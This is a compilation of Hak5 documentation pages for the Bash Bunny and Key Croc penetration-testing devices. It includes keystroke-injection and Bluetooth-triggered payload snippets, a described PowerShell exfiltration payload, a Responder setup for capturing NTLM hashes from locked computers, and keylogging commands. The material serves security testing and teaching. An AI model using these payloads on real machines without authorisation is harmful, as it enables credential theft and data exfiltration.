[Powershell TCP Extractor on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/powershell-tcp-extractor)
This payload copies data to temp directory, compresses the data as a zip file, and uses powershell tcp socket to extract to a listener on remote machine.
The netcat listener IP address and port is configurable. This can be adapted to use an off-site machine as the receiver, or even the Bash Bunny itself.
### More Exfiltration Payloads for the Bash Bunny [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#more-exfiltration-payloads-for-the-bash-bunny)
These only illustrate a very few of the many techniques to an perform exfiltration attack with the Bash Bunny. See all the featured exfiltration payloads at [payloads.hak5.org](https://payloads.hak5.org/)
\\
* * *
[_navigate\_before_ Getting Root on a Bash Bunny from the Serial Console](https://docs.hak5.org/bash-bunny/beginner-guides/getting-root-on-a-bash-bunny-from-the-serial-console/)
[Remote Triggers for the Bash Bunny Mark II _navigate\_next_](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/)
---
# Payload Development Basics | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Payload Development Basics
==========================
Bash Bunny payloads are written in Bash + DuckyScript and can be written in any standard text editor, such as notepad, vi or nano.
When the Bash Bunny boots with its switch in position 1 or 2, the `payload.txt` file within the corresponding switch folder is executed. **Payloads** **must be named** `payload.txt`.
You will find more specific details describing DuckyScript on the Bash Bunny further on in this documentation; additionally, it may be beneficial to further familiarize yourself with Bash if you’re interested in taking full advantage of the tools of the language and bringing your payloads to the next level! There are plenty of useful guides you can find with a simple web search.
Arming Mode [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics/#arming-mode)
----------------------------------------------------------------------------------------------------------------
Payloads can be loaded onto the device simply by moving them to the appropriate switch folder when the Bash Bunny is in arming mode (switch position 3 – closest to the USB plug) – mounted to the host computer as Mass Storage.
report
[Bash Bunny Mark II Considerations](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/)
* * *
[_navigate\_before_ Considerations for Mark II](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/)
[DuckyScript™ On The Bash Bunny _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/duckyscript-on-the-bash-bunny/)
---
# Remote Triggers for the Bash Bunny Mark II | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Remote Triggers for the Bash Bunny Mark II
==========================================
One of the greatest new features of the [Bash Bunny Mark II](https://hak5.org/products/bash-bunny)
is remote triggers. With this, a payload — or multiple stages of a payload — can be triggered from afar. These can be done with any bluetooth low-energy device, including most smartphones. In this article I’ll demonstrate how to use this handy new feature.


### THE SCENARIO [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/#the-scenario)
Imagine a social engineering engagement where the target is asked to print a document from a flash drive. The Bash Bunny, with `ATTACKMODE STORAGE`, will present itself as just such a benign device in the first stage of an attack. Then the opportunity presents itself to launch a second stage — emulating a `HID` device and performing keystroke injection — when the target turns their back to fetch the printout.
### THE CODE [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/#the-code)
> `# # Remote Trigger for Bash Bunny Mark II Example # LED SETUP # # Stage 1: Benign flash drive # ATTACKMODE STORAGE LED STAGE1 WAIT_FOR_PRESENT myphone # # Stage 2: Evil keystroke injection attack # ATTACKMODE STORAGE HID LED STAGE2 QUACK GUI r QUACK DELAY 200 QUACK STRING cmd /k tree c:\ QUACK ENTER`
>
### PULLING OFF THE ATTACK [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/#pulling-off-the-attack)
For this attack to proceed to the second stage, you simply need to advertise the BLE device named “myphone”. This can either be the name of a BLE device that advertises whenever it’s on — like a bluetooth speaker — or advertisements specifically sent from an app like [BLE Tool](https://play.google.com/store/apps/details?id=com.cozyoz.bletool)
.

### **CONFIGURING BLE TOOL** [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/#configuring-ble-tool)
Any bluetooth utility capable of broadcasting BLE advertisements will work. In testing I often times find myself using the highly configurable and aptly named BLE Tool for Android. If you choose to test with it, there are only 3 steps to follow:
1. Tap GATT Server
2. Specify a device name from the Advertiser settings (under the \[…\] menu)
3. Tap Start Advertising
### HOW REMOTE TRIGGERS WORK [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/#how-remote-triggers-work)
The `WAIT_FOR_PRESENT` and `WAIT_FOR_NOT_PRESENT` extensions work by setting the BLE module to Observation mode (`AT+ROLE=2`), then continuously saving the scanned airwaves to a temporary file on a 5 second interval (`timeout 5s cat /dev/ttyS1 > /tmp/bt_observation`). That binary file is then checked for the string value specified with the extension (`grep -qao $1 /tmp/bt_observation`).
If you’re curious what other advertisements might be found, consider running `strings` against this file while in observation mode. For faster remote triggers, consider modifying the extension for shorter scan durations.
* * *
[_navigate\_before_ Top 5 Bash Bunny Exfiltration Payloads to "steal files"](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/)
[Geofencing for the Bash Bunny Mark II _navigate\_next_](https://docs.hak5.org/bash-bunny/beginner-guides/geofencing-for-the-bash-bunny-mark-ii/)
---
# Bash Bunny Phishing Attack with Hamsters | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny Phishing Attack with Hamsters
========================================
[https://youtu.be/TYR2a2XoK3A](https://youtu.be/TYR2a2XoK3A)
* * *
[_navigate\_before_ Bash Bunny Primer](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-primer/)
[Password Grabber Bash Bunny Payload _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/password-grabber-bash-bunny-payload/)
---
# Geofencing for the Bash Bunny Mark II | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Geofencing for the Bash Bunny Mark II
=====================================
Geofencing for the Bash Bunny Mark II [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/geofencing-for-the-bash-bunny-mark-ii/#geofencing-for-the-bash-bunny-mark-ii)
==============================================================================================================================================================================
Once upon a time a friend of mine robbed the wrong bank. True story. Turns out he got the directions wrong on a physical engagement.
Hotplug attacks are great, until they’re not — which is why it’s important to limit the scope of engagement. Thankfully the [Bash Bunny Mark II](https://hak5.org/products/bash-bunny)
can do this with a geofencing feature using bluetooth signals to prevent payloads from running unless it’s certain to be in the defined area.


### THE SCENARIO [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/geofencing-for-the-bash-bunny-mark-ii/#the-scenario)
Imagine an engagement where you want to exfiltrate loot from the boss’ home office. You know she has IoT gear all around her house — voice assistants, wireless lamps, bluetooth speakers. You also know that you definitely don’t want the payload to run if by chance the Bash Bunny walks. Geofencing time!
It’s easy — just prefix your payload with this:
> `WAIT_FOR_PRESENT name-of-btle-device`
>
Now the payload is paused until the Bluetooth low energy device specified is seen. Similarly the geofencing feature can be used to exclude a certain area — only running when Bluetooth devices are not visible.
> `WAIT_FOR_NOT_PRESENT name-of-btle-device`
>
So, how do we know which devices are where? I’m glad you asked. Enter the [Bluetooth Geofence Profiler payload](https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/general/bluetooth-geofence-profiler/payload.txt)
.
### THE CODE [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/geofencing-for-the-bash-bunny-mark-ii/#the-code)
> `# Title: Bluetooth Geofence Profiler # Description: Saves bluetooth scan in loot folder for geofenced payloads # Author: Hak5Darren # Version: 1.0 # Category: General # # Enable serial BTLE module # LED SETUP stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost sleep 1 # # Set BTLE module to observation mode # echo -n -e "AT+ROLE=2" > /dev/ttyS1 echo -n -e "AT+RESET" > /dev/ttyS1 # # Copy strings from 10 second observation scan to file in loot folder # LED ATTACK timeout 10s cat /dev/ttyS1 > /tmp/bt_observation strings /tmp/bt_observation > /root/udisk/loot/btle-profile.txt # # Sync file system and finish # LED CLEANUP sync LED FINISH`
>
Load this payload to your switch position of choosing and execute while in the vicinity you wish to wirelessly profile. It’ll create a new btle-profile.txt file in the loot folder. In it you’ll find strings from the BTLE wireless landscape. For example, at my place I find the following:
> `Ld+x LE-Bose SoundLink Micro Ld+x MBAudio`
>
### PULLING OFF THE ATTACK [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/geofencing-for-the-bash-bunny-mark-ii/#pulling-off-the-attack)
Armed with the Bluetooth Low Energy landscape of our target, we can populate our payload with WAIT\_FOR\_PRESENT commands to prevent the payload from further executing until, as the Ducky Script command implies, they’re present.
Double up on the devices to even further the specificity!
`WAIT_FOR_PRESENT SoundLink`
`WAIT_FOR_PRESENT MBAudio`
Even if the Bash Bunny finds its way into an area where another Bose SoundLink Micro device lives, the payload will continue to halt until MBAudio is also seen. The more devices are specified, the greater the geofence.
### HOW GEOFENCING WORKS [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/geofencing-for-the-bash-bunny-mark-ii/#how-geofencing-works)
The [WAIT\_FOR\_PRESENT extension](https://github.com/hak5/bashbunny-payloads/blob/master/payloads/extensions/wait_for_present.sh)
accepts a single parameter ($1) — in our case SoundLink or MBAudio — and continues looping over a scan of the BTLE landscape until the string specified is found via grep.
This is the same extension that can be used for [remote triggers](https://hak5.org/blogs/bash-bunny/remote-triggers-for-the-bash-bunny-mark-ii)
for multi-stage payloads.
* * *
[_navigate\_before_ Remote Triggers for the Bash Bunny Mark II](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/)
[Bash Bunny Primer _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-primer/)
---
# Password Grabber Bash Bunny Payload | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Password Grabber Bash Bunny Payload
===================================
[`https://youtu.be/LtqsKftRFiw`](https://youtu.be/LtqsKftRFiw)
* * *
[_navigate\_before_ Bash Bunny Phishing Attack with Hamsters](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-phishing-attack-with-hamsters/)
[Operating System Detection with the Bash Bunny _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/operating-system-detection-with-the-bash-bunny/)
---
# Operating System Detection with the Bash Bunny | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Operating System Detection with the Bash Bunny
==============================================
[https://youtu.be/A6Wq7KcUOo8](https://youtu.be/A6Wq7KcUOo8)
* * *
[_navigate\_before_ Password Grabber Bash Bunny Payload](https://docs.hak5.org/bash-bunny/video-guides/password-grabber-bash-bunny-payload/)
[Bash Bunny Extensions _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-extensions/)
---
# Bash Bunny Payload - Sudo Bashdoor on Linux | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny Payload - Sudo Bashdoor on Linux
===========================================
[https://youtu.be/KbXazzp8QZQ](https://youtu.be/KbXazzp8QZQ)
* * *
[_navigate\_before_ Reverse Shells on Linux with Bash Bunny](https://docs.hak5.org/bash-bunny/video-guides/reverse-shells-on-linux-with-bash-bunny/)
[Bash Bunny Payload - 1990s Prank _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-payload-1990s-prank/)
---
# Bash Bunny Payload - 1990s Prank | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny Payload - 1990s Prank
================================
[https://youtu.be/Ei6YhehET3Y](https://youtu.be/Ei6YhehET3Y)
* * *
[_navigate\_before_ Bash Bunny Payload - Sudo Bashdoor on Linux](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-payload-sudo-bashdoor-on-linux/)
[Bash Bunny Dev - Behind the Scenes _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-dev-behind-the-scenes/)
---
# Bash Bunny Dev - Behind the Scenes | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny Dev - Behind the Scenes
==================================
[https://youtu.be/J33mkvdKR5U](https://youtu.be/J33mkvdKR5U)
* * *
[_navigate\_before_ Bash Bunny Payload - 1990s Prank](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-payload-1990s-prank/)
[Concealed Exfiltration - Pocket Network Attacks with the Bash Bunny _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/concealed-exfiltration-pocket-network-attacks-with-the-bash-bunny/)
---
# Concealed Exfiltration - Pocket Network Attacks with the Bash Bunny | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Concealed Exfiltration - Pocket Network Attacks with the Bash Bunny
===================================================================
[https://youtu.be/VPhqD\_\_lOBQ](https://youtu.be/VPhqD__lOBQ)
* * *
[_navigate\_before_ Bash Bunny Dev - Behind the Scenes](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-dev-behind-the-scenes/)
[How to write Bash Bunny payloads and contribute on GitHub _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/how-to-write-bash-bunny-payloads-and-contribute-on-github/)
---
# Bash Bunny Extensions | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny Extensions
=====================
[https://youtu.be/GHZCqCESxTw](https://youtu.be/GHZCqCESxTw)
* * *
[_navigate\_before_ Operating System Detection with the Bash Bunny](https://docs.hak5.org/bash-bunny/video-guides/operating-system-detection-with-the-bash-bunny/)
[Reverse Shells on Linux with Bash Bunny _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/reverse-shells-on-linux-with-bash-bunny/)
---
# Reverse Shells on Linux with Bash Bunny | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Reverse Shells on Linux with Bash Bunny
=======================================
[https://youtu.be/JlGSuQ21Vt8](https://youtu.be/JlGSuQ21Vt8)
* * *
[_navigate\_before_ Bash Bunny Extensions](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-extensions/)
[Bash Bunny Payload - Sudo Bashdoor on Linux _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-payload-sudo-bashdoor-on-linux/)
---
# How to write Bash Bunny payloads and contribute on GitHub | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
How to write Bash Bunny payloads and contribute on GitHub
=========================================================
[https://youtu.be/H6z9BXevsZg](https://youtu.be/H6z9BXevsZg)
* * *
[_navigate\_before_ Concealed Exfiltration - Pocket Network Attacks with the Bash Bunny](https://docs.hak5.org/bash-bunny/video-guides/concealed-exfiltration-pocket-network-attacks-with-the-bash-bunny/)
---
# Attack Mode | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Attack Mode
===========
`ATTACKMODE` is a DuckyScript command which specifies which devices to emulate. The ATTACKMODE command may be issued multiple times within a given payload. For example, a payload may begin by emulating Ethernet, then switch to emulating a keyboard and serial later based on a number of conditions.
| ATTACKMODE | Description |
| --- | --- |
| `SERIAL` | ACM – Abstract Control Model Serial Console |
| `ECM_ETHERNET` | ECM – Ethernet Control Model Linux/Mac/Android Ethernet Adapter |
| `RNDIS_ETHERNET` | RNDIS – Remote Network Driver Interface Specification Windows (and some Linux) Ethernet Adapter |
| `AUTO_ETHERNET` | Automatic Ethernet. This attack mode will first attempt to bring up ECM\_ETHERNET. If after the default timeout of 20 seconds no connection is established, RNDIS\_ETHERNET will be attempted. The timeout may be changed by adding ETHERNET\_TIMEOUT\_XX where XX is the number of seconds, e.g. ETHERNET\_TIMEOUT\_60 for one minute. Requires firmware version 1.5+ |
| `STORAGE` | UMS – USB Mass Storage Flash Drive |
| `HID` | HID – Human Interface Device Keyboard – Keystroke Injection via Ducky Script |
Many combinations of attack modes are possible, however some are not. For example, `ATTACKMODE HID STORAGE ECM_ETHERNET` is valid while `ATTACKMODE RNDIS_ETHERNET ECM_ETHERNET STORAGE SERIAL` is not. Each attack mode combination registers using a different USB VID/PID (Vendor ID/Product ID) by default. VID and PID can be spoofed using the VID and PID commands.
| ATTACKMODE COMBINATION | VID / PID |
| --- | --- |
| SERIAL STORAGE | 0xF000/0xFFF0 |
| HID | 0xF000/0xFF01 |
| STORAGE | 0xF000/0xFF10 |
| SERIAL | 0xF000/0xFF11 |
| RNDIS\_ETHERNET | 0xF000/0xFF12 |
| ECM\_ETHERNET | 0xF000/0xFF13 |
| HID SERIAL | 0xF000/0xFF14 |
| HID STORAGE | 0xF000/0xFF02 |
| HID RNDIS\_ETHERNET | 0xF000/0xFF03 |
| HID ECM\_ETHERNET | 0xF000/0xFF04 |
| HID STORAGE RNDIS\_ETHERNET | 0xF000/0xFF05 |
| HID STORAGE ECM\_ETHERNET | 0xF000/0xFF06 |
| SERIAL RNDIS\_ETHERNET | 0xF000/0xFF07 |
| SERIAL ECM\_ETHERNET | 0xF000/0xFF08 |
| STORAGE RNDIS\_ETHERNET | 0xF000/0xFF20 |
| STORAGE ECM\_ETHERNET | 0xF000/0xFF21 |
* * *
[_navigate\_before_ Extensions](https://docs.hak5.org/bash-bunny/writing-payloads/extensions/)
[VID, PID, MAN, PROD, SN _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/attackmode/vid-pid-man-prod-sn/)
---
# Getting the Bash Bunny Online | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Getting the Bash Bunny Online
=============================
Getting the Bash Bunny online can be convenient for a number of reasons, such as installing software with apt or git. Similar to the WiFi Pineapple, the host computer’s Internet connection can be shared with the Bash Bunny. Begin by setting the Bash Bunny to Ethernet mode. For Windows hosts, you’ll want to boot the bash bunny with a payload.txt containing `ATTACKMODE RNDIS_ETHERNET` On a Linux host you’ll most likely want `ATTACKMODE ECM_ETHERNET`. With the Bash Bunny booted and registering on your host computer as an Ethernet device, you can now share its Internet connection.
* * *
[_navigate\_before_ WAIT\_FOR\_PRESENT](https://docs.hak5.org/bash-bunny/writing-payloads/wait_for_present/)
[Sharing an Internet connection from Windows _navigate\_next_](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-windows/)
---
# Updating the Bash Bunny Firmware | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Updating the Bash Bunny Firmware
================================
Overview [_link_](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#overview)
----------------------------------------------------------------------------------------------------------------
From time to time Hak5 releases firmware updates for the Bash Bunny including new features, bug fixes and security improvements. The easiest way to install these is with the Bash Bunny updater.
Your Bash Bunny can be easily upgraded to the latest firmware version. Just copying an upgrade file to the root of the Bash Bunny flash drive in arming mode, safely eject it, and plug it back into your computer in arming mode.
The first time the Bash Bunny is upgraded it will indicate the flashing process with a red blinking LED for up to 10 minutes. The flashing process will be followed by a green LED to indicate that the Bash Bunny is rebooting. Finally the standard slow blinking blue LED will indicate that the flashing process has succeeded and arming mode is ready.
### WARNINGS [_link_](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#warnings)
report
**Bash Bunny Mark I** Users: **DO NOT** flash Bash Bunny firmware 1.7 — this is only for the Bash Bunny Mark II.
report
**Bash Bunny Mark II** Users: your device ships with firmware version 1.7 already. There is no need to re-flash this firmware. Further, **DO NOT** downgrade to a previous firmware version as doing so will render your device inoperable.
Upgrades should be done with the SD card removed.
report
**DO NOT** unplug the Bash Bunny while firmware upgrade is in progress. Doing so will spell certain doom.
report
**DO NOT** extract the contents of the downloaded `.tar.gz` to the Bash Bunny or change the name of the downloaded `.tar.gz` file. Doing so will put your Bash Bunny into a boot loop on firmwares 1.0 to 1.3.
### STEP BY STEP FIRMWARE UPGRADE INSTRUCTIONS [](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#step-by-step-firmware-upgrade-instructions)
[_link_](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#step-by-step-firmware-upgrade-instructions)
1. Download the latest version of the Bash Bunny firmware from [https://downloads.hak5.org](https://downloads.hak5.org/)
. Do not extract the .tar.gz archive
2. Verify that the SHA256 checksum of the downloaded firmware files matches the checksum listed from the download site
3. Slide the Bash Bunny switch into Arming Mode (closest to the USB plug) and plug the Bash Bunny into your computer
4. Copy the firmware upgrade file downloaded in step 1 to the root of the Bash Bunny flash drive.
5. Safely eject the Bash Bunny flash drive (**IMPORTANT**)
6. With the switch still in Arming Mode, plug the Bash Bunny back into your computer and wait 10 minutes.
info
Following version 1.0, all future upgrades and firmware recoveries will be indicated by a special LED “police” pattern, alternating quickly between red and blue.
report
MacOS / Safari users: [disable automatic unzipping](https://discussions.apple.com/thread/3736146)
### LED STATUS FOR UPGRADES _FROM 1.0 TO 1.1_ [](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#led-status-for-upgrades-from-10-to-11)
[_link_](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#led-status-for-upgrades-from-10-to-11)
| LED | Status |
| --- | --- |
| Red Blinking | Flashing in progress |
| Green Solid | Rebooting |
| Blue Blinking | Flash complete |
### LED STATUS FOR UPGRADES _FROM 1.1 ONWARDS_ [](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#led-status-for-upgrades-from-11-onwards)
[_link_](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/#led-status-for-upgrades-from-11-onwards)
| LED | Status |
| --- | --- |
| Red/Blue Alternating | Flashing in progress |
| Green Solid | Rebooting |
| Blue Blinking | Flash complete |
* * *
[_navigate\_before_ Sharing an Internet connection from MacOS](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-macos/)
[Factory Reset _navigate\_next_](https://docs.hak5.org/bash-bunny/troubleshooting/factory-reset/)
---
# Factory Reset | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Factory Reset
=============
In the extreme case that the Bash Bunny has become permanently inaccessible or inoperative, there is a quick method for recovery using a special boot pattern.
1. Set the switch to arming mode (closest to the USB port)
2. Plug the Bash Bunny into a USB port and unplug it immediately after the green LED turns off
3. Repeat step #2 three times
4. Plug the Bash Bunny into a USB port and wait approximately 5 minutes for it to reset. The LED will either show an alternating red/blue “police” pattern or blink red.
5. When the firmware recovery has completed, the Bash Bunny will reboot, indicated by the green LED, then go into arming mode, indicated by the blue LED.
This process will restore the Bash Bunny to the original factory firmware version 1.0. At this point you are advised to update your Bash Bunny to the latest version.
### Bash Bunny Mark I Factory Reset [_link_](https://docs.hak5.org/bash-bunny/troubleshooting/factory-reset/#bash-bunny-mark-i-factory-reset)
[Bash Bunny Mark I reset process](https://youtu.be/Fp5N6Mf1_U8)
### Bash Bunny Mark II Factory Reset [_link_](https://docs.hak5.org/bash-bunny/troubleshooting/factory-reset/#bash-bunny-mark-ii-factory-reset)
[Bash Bunny Mark II reset process](https://www.youtube.com/watch?v=VooefjO8dvA)
* * *
[_navigate\_before_ Updating the Bash Bunny Firmware](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/)
[Password Reset _navigate\_next_](https://docs.hak5.org/bash-bunny/troubleshooting/password-reset/)
---
# Network Hijacking Attacks with the Bash Bunny | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Network Hijacking Attacks with the Bash Bunny
=============================================
Exploiting local network attack vectors, the Bash Bunny emulates specialized Ethernet adapters. That means the target computer sees the Bash Bunny not as an ordinary flash drive, but as a USB Ethernet Adapter connected to a network. It’s a network of two – the Bash Bunny and your target – and once connected, you’ll have direct access to the target bypassing any would-be firewalls, countermeasures or intrusion detection systems from the legitimate LAN.

This is done in such a way that allows the Bash Bunny to be recognized on the victim computer as the fastest network, without drivers, automatically – locked or unlocked. As a 2 gigabit adapter with an authoritative DHCP server, the Bash Bunny obtains a low metric. This means that the computer will instantly trust the Bash Bunny with its network traffic — enabling a plethora of automated pocket network attacks undetectable by the existing infrastructure.
These bring-your-own-network attacks are cross-platform, with the Bash Bunny exploiting Mac, Linux, and Android computers with its ECM Ethernet attack mode, and Windows computers with its Microsoft proprietary RNDIS Ethernet attack mode.
Using these methods, attack like [QuickCreds](https://github.com/hak5/bashbunny-payloads)
for example are able to steal hashed credentials from locked computers in seconds. Plug the Bash Bunny into a computer, wait a few seconds and when the light is green – the trap is clean!
Let’s take a look at how the Bash Bunny pulls off this simple and effective attack.
First we issue the Ethernet attack mode specific for our target. If it’s Windows, we’ll want to use `RNDIS_ETHERNET`. If it’s a Mac or Linux target, we’ll want to use `ECM_ETHERNET`. Even better - if we’re not sure, simply use `AUTO_ETHERNET` which will try both.
`# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET. Try AUTO_ETHERNET for both. ATTACKMODE RNDIS_ETHERNET #ATTACKMODE ECM_ETHERNET #ATTACKMODE AUTO_ETHERNET # Set variables for the target's computer name and IP address. GET TARGET_HOSTNAME GET TARGET_IP`
In the above example, we also grab variables for the target’s hostname and IP address, which is useful for naming the logs that we lovingly call loot.
`# Run Responder with specified options python Responder.py -I usb0 $RESPONDER_OPTIONS & # Wait until NTLM log is found until [ -f logs/*NTLM* ] do # Ima just loop here until NTLM logs are found sleep 1 done`
Then we simply run Responder on the usb0 interface - which is the network directly connected to the target using the Ethernet attack mode above. Finally, we wait until the NTLM hashes are captured. Easy!
With a full TCP/IP stack and all common Linux-based tools at your disposal, the possibilities for pocket network attacks are endless!
* * *
[_navigate\_before_ Writing Keystroke Injection Payloads for the Bash Bunny](https://docs.hak5.org/bash-bunny/beginner-guides/writing-keystroke-injection-payloads-for-the-bash-bunny/)
[Getting Root on a Bash Bunny from the Serial Console _navigate\_next_](https://docs.hak5.org/bash-bunny/beginner-guides/getting-root-on-a-bash-bunny-from-the-serial-console/)
---
# Bash Bunny Primer | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Bash Bunny Primer
=================
[https://youtu.be/8j6hrjSrJaM](https://youtu.be/8j6hrjSrJaM)
* * *
[_navigate\_before_ Geofencing for the Bash Bunny Mark II](https://docs.hak5.org/bash-bunny/beginner-guides/geofencing-for-the-bash-bunny-mark-ii/)
[Bash Bunny Phishing Attack with Hamsters _navigate\_next_](https://docs.hak5.org/bash-bunny/video-guides/bash-bunny-phishing-attack-with-hamsters/)
---
# Command Quick Reference | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Command Quick Reference
=======================
MATCH [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#match)
-----------------------------------------------------------------------------------------------
`MATCH `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example)
`MATCH hello`
Will trigger payload execution when specified pattern is typed.
See the [MATCH article](https://docs.hak5.org/hc/en-us/articles/360048015513)
for full usage.
SAVEKEYS [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#savekeys)
-----------------------------------------------------------------------------------------------------
`SAVEKEYS `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-1)
`MATCH hello SAVEKEYS /root/loot/test.log NEXT 6`
Will save the specified number of keys to a file – either before (LAST) or after (NEXT) the payload MATCH.
See the [SAVEKEYS article](https://docs.hak5.org/hc/en-us/articles/360048015513)
for full usage.
QUACK [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#quack)
-----------------------------------------------------------------------------------------------
`QUACK `
